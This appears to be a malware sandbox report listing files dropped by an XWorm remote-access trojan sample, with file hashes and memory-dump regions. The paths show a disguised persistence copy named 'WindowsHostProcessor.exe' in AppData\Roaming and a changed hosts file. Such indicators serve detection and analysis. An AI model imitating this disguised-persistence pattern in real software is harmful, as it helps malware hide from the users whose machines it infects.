Filesize
444KB

MD5
32b9404c781c7e14e32755a98d93b608

SHA1
40803b89f251543a6647feced5f326e00985aa29

SHA256
87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97

SHA512
79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm2.exe

Filesize
444KB

MD5
32b9404c781c7e14e32755a98d93b608

SHA1
40803b89f251543a6647feced5f326e00985aa29

SHA256
87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97

SHA512
79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm3.exe

Filesize
1.5MB

MD5
27543547fa480422e56e0b4cdbb09488

SHA1
35f701bc2c43a308098251d9d413e64e52176fc2

SHA256
9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664

SHA512
a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm3.exe

Filesize
1.5MB

MD5
27543547fa480422e56e0b4cdbb09488

SHA1
35f701bc2c43a308098251d9d413e64e52176fc2

SHA256
9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664

SHA512
a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2ptnm12m.4gm3.exe

Filesize
1.5MB

MD5
27543547fa480422e56e0b4cdbb09488

SHA1
35f701bc2c43a308098251d9d413e64e52176fc2

SHA256
9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664

SHA512
a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5yuczjy.t12.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y0.exe

Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y1.exe

Filesize
5.8MB

MD5
c4b8578d2354c38613669b1c82a08ccb

SHA1
f6b0353977350e42d6a4f09f887c41b51c1adf6e

SHA256
3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2

SHA512
903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y2.exe

Filesize
444KB

MD5
32b9404c781c7e14e32755a98d93b608

SHA1
40803b89f251543a6647feced5f326e00985aa29

SHA256
87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97

SHA512
79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y2.exe

Filesize
444KB

MD5
32b9404c781c7e14e32755a98d93b608

SHA1
40803b89f251543a6647feced5f326e00985aa29

SHA256
87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97

SHA512
79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ldkh2x5b.54y3.exe

Filesize
1.5MB

MD5
27543547fa480422e56e0b4cdbb09488

SHA1
35f701bc2c43a308098251d9d413e64e52176fc2

SHA256
9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664

SHA512
a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsHostProcessor\WindowsHostProcessor.exe

Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
C:\Users\Admin\Downloads\XWorm-3.1-main.zip

Filesize
5.4MB

MD5
98d79274e2a2acbf9509a4e4819879fe

SHA1
34312cc3b047639f1f91aabfc5eaa976401b3fc3

SHA256
4a08ee47fac4889a604d43ee18641cef11f0ac79564de5e8e8a1c427820f4a03

SHA512
89d6ca4a9b57162d1dc6d28fec5cb2f9262c34979f5bc009d32964d318da00d21d05993dbe004ca04c25e5a9ef45cbb63db849e5bd953fe0953ee172b6a4be85

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
3KB

MD5
373b4f5993a785b6659272155ca77076

SHA1
340d218d4a6c860ed62d12511078d2bd49b45c8a

SHA256
56400faba03fe6420cc80b4b9b2f1a2bcf71b0f7f8810019610ad0cf985edf0c

SHA512
fbefeda3c8464ae976f135d93b8c9faa5d1cc6e2f95480535a2393861c0ec6df0e3ffeb59f86e7ee9d8b5b7acb483491b66e58220c1416d57f52c1889679f26a

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
373b4f5993a785b6659272155ca77076

SHA1
340d218d4a6c860ed62d12511078d2bd49b45c8a

SHA256
56400faba03fe6420cc80b4b9b2f1a2bcf71b0f7f8810019610ad0cf985edf0c

SHA512
fbefeda3c8464ae976f135d93b8c9faa5d1cc6e2f95480535a2393861c0ec6df0e3ffeb59f86e7ee9d8b5b7acb483491b66e58220c1416d57f52c1889679f26a

Download Submit
\??\c:\users\admin\appdata\local\temp\2ptnm12m.4gm0.exe

Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
\??\c:\users\admin\appdata\local\temp\2ptnm12m.4gm1.exe

Filesize
5.8MB

MD5
c4b8578d2354c38613669b1c82a08ccb

SHA1
f6b0353977350e42d6a4f09f887c41b51c1adf6e

SHA256
3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2

SHA512
903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

Download Submit
\??\c:\users\admin\appdata\local\temp\ldkh2x5b.54y0.exe

Filesize
91KB

MD5
17d1a593f7481f4a8cf29fb322d6f472

SHA1
a24d8e44650268f53ca57451fe564c92c0f2af35

SHA256
f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c

SHA512
8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

Download Submit
\??\c:\users\admin\appdata\local\temp\ldkh2x5b.54y1.exe

Filesize
5.8MB

MD5
c4b8578d2354c38613669b1c82a08ccb

SHA1
f6b0353977350e42d6a4f09f887c41b51c1adf6e

SHA256
3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2

SHA512
903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

Download Submit
\??\c:\users\admin\appdata\local\temp\ldkh2x5b.54y3.exe

Filesize
1.5MB

MD5
27543547fa480422e56e0b4cdbb09488

SHA1
35f701bc2c43a308098251d9d413e64e52176fc2

SHA256
9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664

SHA512
a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

Download Submit
memory/380-1040-0x000002CC0AAD0000-0x000002CC0AAF7000-memory.dmp

Filesize
156KB

Download
memory/380-989-0x000002CC0AAD0000-0x000002CC0AAF7000-memory.dmp

Filesize
156KB

Download
memory/380-992-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/632-979-0x0000023911600000-0x0000023911627000-memory.dmp

Filesize
156KB

Download
memory/632-976-0x00000239115D0000-0x00000239115F1000-memory.dmp

Filesize
132KB

Download
memory/632-985-0x00007FF944F4F000-0x00007FF944F50000-memory.dmp

Filesize
4KB

Download
memory/632-982-0x00007FF944F4D000-0x00007FF944F4E000-memory.dmp

Filesize
4KB

Download
memory/688-1030-0x00007FF944F4F000-0x00007FF944F50000-memory.dmp

Filesize
4KB

Download
memory/688-1025-0x00007FF944F4D000-0x00007FF944F4E000-memory.dmp

Filesize
4KB

Download
memory/688-1020-0x000001BB66D40000-0x000001BB66D67000-memory.dmp

Filesize
156KB

Download
memory/688-983-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/688-981-0x000001BB66D40000-0x000001BB66D67000-memory.dmp

Filesize
156KB

Download
memory/696-838-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-840-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-831-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-839-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-830-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-829-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-841-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-836-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-837-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/696-835-0x0000026B07910000-0x0000026B07911000-memory.dmp

Filesize
4KB

Download
memory/908-1003-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/908-1063-0x0000019107AF0000-0x0000019107B17000-memory.dmp

Filesize
156KB

Download
memory/908-999-0x0000019107AF0000-0x0000019107B17000-memory.dmp

Filesize
156KB

Download
memory/976-987-0x000001E5E65A0000-0x000001E5E65C7000-memory.dmp

Filesize
156KB

Download
memory/976-1035-0x000001E5E65A0000-0x000001E5E65C7000-memory.dmp

Filesize
156KB

Download
memory/976-1045-0x00007FF944F4C000-0x00007FF944F4D000-memory.dmp

Filesize
4KB

Download
memory/976-991-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/1060-1007-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/1060-1002-0x0000021E6F110000-0x0000021E6F137000-memory.dmp

Filesize
156KB

Download
memory/1076-1012-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/1076-1008-0x0000013B797D0000-0x0000013B797F7000-memory.dmp

Filesize
156KB

Download
memory/1192-1017-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/1192-1013-0x0000022196320000-0x0000022196347000-memory.dmp

Filesize
156KB

Download
memory/1228-1022-0x00007FF904F30000-0x00007FF904F40000-memory.dmp

Filesize
64KB

Download
memory/1228-1018-0x000001A277AB0000-0x000001A277AD7000-memory.dmp

Filesize
156KB

Download
memory/1276-1023-0x0000028C1FDD0000-0x0000028C1FDF7000-memory.dmp

Filesize
156KB

Download
memory/1640-1005-0x00007FF7D2010000-0x00007FF7D2039000-memory.dmp

Filesize
164KB

Download
memory/1640-975-0x00007FF9439A0000-0x00007FF943A5E000-memory.dmp

Filesize
760KB

Download
memory/1640-974-0x00007FF944EB0000-0x00007FF9450A5000-memory.dmp

Filesize
2.0MB

Download
memory/1644-1071-0x00000214026F0000-0x0000021402700000-memory.dmp

Filesize
64KB

Download
memory/1644-1067-0x00000214026F0000-0x0000021402700000-memory.dmp

Filesize
64KB

Download
memory/1644-1058-0x00007FF926140000-0x00007FF926C01000-memory.dmp

Filesize
10.8MB

Download
memory/1992-826-0x00000000074D0000-0x00000000074DE000-memory.dmp

Filesize
56KB

Download
memory/1992-785-0x0000000071530000-0x000000007157C000-memory.dmp

Filesize
304KB

Download
memory/1992-651-0x0000000005850000-0x00000000058B6000-memory.dmp

Filesize
408KB

Download
memory/1992-650-0x0000000005060000-0x0000000005082000-memory.dmp

Filesize
136KB

Download
memory/1992-674-0x0000000004C90000-0x0000000004CAE000-memory.dmp

Filesize
120KB

Download
memory/1992-749-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/1992-750-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/1992-751-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/1992-921-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/1992-778-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/1992-784-0x0000000006F00000-0x0000000006F32000-memory.dmp

Filesize
200KB

Download
memory/1992-842-0x00000000075F0000-0x0000000007612000-memory.dmp

Filesize
136KB

Download
memory/1992-795-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
memory/1992-649-0x0000000005130000-0x0000000005758000-memory.dmp

Filesize
6.2MB

Download
memory/1992-818-0x00000000072B0000-0x00000000072CA000-memory.dmp

Filesize
104KB

Download
memory/1992-648-0x0000000004960000-0x0000000004996000-memory.dmp

Filesize
216KB

Download
memory/1992-647-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/1992-827-0x0000000007520000-0x000000000753A000-memory.dmp

Filesize
104KB

Download
memory/1992-652-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/1992-646-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/1992-861-0x000000007F4A0000-0x000000007F4B0000-memory.dmp

Filesize
64KB

Download
memory/1992-844-0x0000000004AF0000-0x0000000004B00000-memory.dmp

Filesize
64KB

Download
memory/1992-843-0x0000000008520000-0x0000000008AC4000-memory.dmp

Filesize
5.6MB

Download
memory/2068-990-0x00007FF61EBD0000-0x00007FF61F19C000-memory.dmp

Filesize
5.8MB

Download
memory/3792-817-0x00000000074D0000-0x0000000007B4A000-memory.dmp

Filesize
6.5MB

Download
memory/3792-890-0x000000007F040000-0x000000007F050000-memory.dmp

Filesize
64KB

Download
memory/3792-828-0x0000000007110000-0x0000000007118000-memory.dmp

Filesize
32KB

Download
memory/3792-662-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/3792-823-0x0000000007130000-0x00000000071C6000-memory.dmp

Filesize
600KB

Download
memory/3792-663-0x0000000004710000-0x0000000004720000-memory.dmp

Filesize
64KB

Download
memory/3792-664-0x0000000004710000-0x0000000004720000-memory.dmp

Filesize
64KB

Download
memory/3792-820-0x0000000006EE0000-0x0000000006EEA000-memory.dmp

Filesize
40KB

Download
memory/3792-824-0x0000000004710000-0x0000000004720000-memory.dmp

Filesize
64KB

Download
memory/3792-926-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/3792-825-0x0000000004710000-0x0000000004720000-memory.dmp

Filesize
64KB

Download
memory/3792-796-0x0000000071530000-0x000000007157C000-memory.dmp

Filesize
304KB

Download
memory/3792-819-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/3848-1001-0x000001F0CAEE0000-0x000001F0CAEE3000-memory.dmp

Filesize
12KB

Download
memory/3936-1097-0x000002603FD40000-0x000002603FD50000-memory.dmp

Filesize
64KB

Download
memory/3936-1085-0x00007FF926140000-0x00007FF926C01000-memory.dmp

Filesize
10.8MB

Download
memory/4008-949-0x000001F6CCE90000-0x000001F6CCEA0000-memory.dmp

Filesize
64KB

Download
memory/4008-947-0x00007FF926270000-0x00007FF926D31000-memory.dmp

Filesize
10.8MB

Download
memory/4008-962-0x000001F6CCE90000-0x000001F6CCEA0000-memory.dmp

Filesize
64KB

Download
memory/4008-969-0x00007FF926270000-0x00007FF926D31000-memory.dmp

Filesize
10.8MB

Download
memory/4124-965-0x00007FF926270000-0x00007FF926D31000-memory.dmp

Filesize
10.8MB

Download
memory/4124-937-0x00007FF926270000-0x00007FF926D31000-memory.dmp

Filesize
10.8MB

Download
memory/4124-927-0x00000277DBDB0000-0x00000277DBDD2000-memory.dmp

Filesize
136KB

Download
memory/4124-938-0x00000277F4310000-0x00000277F4320000-memory.dmp

Filesize
64KB

Download
memory/4124-939-0x00000277F4310000-0x00000277F4320000-memory.dmp

Filesize
64KB

Download
memory/4124-946-0x00000277F4310000-0x00000277F4320000-memory.dmp

Filesize
64KB

Download
memory/4208-942-0x00000000021A0000-0x00000000025A0000-memory.dmp

Filesize
4.0MB

Download
memory/4208-940-0x00000000020A0000-0x00000000020A7000-memory.dmp

Filesize
28KB

Download
memory/4208-941-0x00000000021A0000-0x00000000025A0000-memory.dmp

Filesize
4.0MB

Download
memory/4208-943-0x00000000021A0000-0x00000000025A0000-memory.dmp

Filesize
4.0MB

Download
memory/4208-944-0x00000000021A0000-0x00000000025A0000-memory.dmp

Filesize
4.0MB

Download
memory/4692-951-0x0000000002370000-0x0000000002770000-memory.dmp

Filesize
4.0MB

Download
memory/4692-952-0x0000000002370000-0x0000000002770000-memory.dmp

Filesize
4.0MB

Download
memory/5048-998-0x00007FF6FDA60000-0x00007FF6FE02C000-memory.dmp

Filesize
5.8MB

Download